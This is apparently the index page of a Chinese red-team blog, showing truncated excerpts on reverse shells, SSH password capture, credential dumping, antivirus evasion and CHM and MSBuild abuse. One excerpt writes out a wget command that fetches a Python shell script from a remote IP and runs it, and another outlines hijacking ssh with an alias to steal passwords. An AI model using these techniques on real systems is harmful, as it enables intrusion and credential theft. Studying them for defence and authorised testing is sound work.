FRP代理钉钉通知
主要项目:https://github.com/arugal/frp-notify可以直接下载release版本即可,或者自行使用realse.sh进行编译。目录介绍frp-notify└───system||frp-notify.service#linux系统服务配置文件|│frp-notify#
人若无名便可专心练剑
Scroll Down「Tips」命令执行无回显无法反弹shell的后续操作
我一般在遇到Java反序列化可以命令执行后,会选择用python的方式反弹shell。先wget下载wgethttp://123.123.123.123/shell.py-O/tmp/shell.py然后再执行python/tmp/shell.py这样一般不用去考虑符号带来的编码问题了。虽然要繁琐些
Linux下低权限用户记录SSH的密码
实现思路 当用户执行sshuser@remotehost时,实际上执行的是我的恶意脚本,负责将用户输入的密码存在本地,并传参给正常的SSH连接,实现抓取SSH密码的功能。具体步骤首先使用alias命令创建一个别名这样当用户执行ssh时,执行的是指定的脚本aliasssh="/tmp/
[转载]DEVCORE 红队的进化,与下一步
前言 「红队演练」近年来渐渐开始被大家提及,也开始有一些厂商推出红队服务。不过关于在台湾红队是怎么做的就比较少人公开分享,身为第一个在台湾推红队演练的公司,我想就根据这两年多来的实战经验,分享为什么我们要做红队、我们面临到的问题、以及在我们心中认为红队成员应该具备的特质。最后再分享我们现阶段看
ATT&CK技术-T1003-Credential Dumping
CredentialDumping凭证转储ID:T1003Source:https://attack.mitre.org/techniques/T1003/DetailsProcDumpandMimikatz下载ProcDump工具到需要抓取密码的那台主机上:可以使用Powershell来下载,或者
使用Simple-Loader绕过杀软
环境:Language:C#.NETFramework4.0VisualStudio2019(community)BuildArchitecture:x64ShellCode:MSFVenomwindows/execx32或者CobalStrikex32生成Payloadcalc测试payloadm
ATT&CK技术-T1223-Compiled HTML File
CHM文件是各种内容的压缩编译,例如HTML文档,图像和脚本/Web相关的编程语言,如VBA,JScript,Java和ActiveX。内容使用HTMLHelpexecutableprogram(hh.exe)加载的InternetExplorer浏览器基础组件显示。 攻击者可能滥用此
2019年终总结
2019年过的实在太快了,回顾并总结一下自己2019年主要干了哪些事情吧。做了哪些日常搞站:BC,贷款,诈骗,传销,资金盘等培训:金融类行业,公安单位,电网公司,CTF等比赛:各市、省、部等地方护网,各行业、单位护网等预警:编写漏洞预警和复现等固定检测:客户季度检测学了哪些内网渗透手法学习C
MSBuild免杀上线
介绍MSBuild是Microsoft和VisualStudio的生成系统。它不仅仅是一个构造工具,应该称之为拥有相当强大扩展能力的自动化平台。MSBuild平台的主要涉及到三部分:执行引擎、构造工程、任务。其中最核心的就是执行引擎,它包括定义构造工程的规范,解释构造工程,执行“构造动作”;构造工程
PowerLine工具使用
BrianFehrman(@fullmetalcache)创建的非常好的实用程序,可以直接调用PowerShell脚本而不需要调用PowerShell程序。这个工具是用C#编写的,可以完全通过命令行使用,包括远程使用。简而言之,你可以使用已经存在的PowerShell脚本,而无需使用PowerShe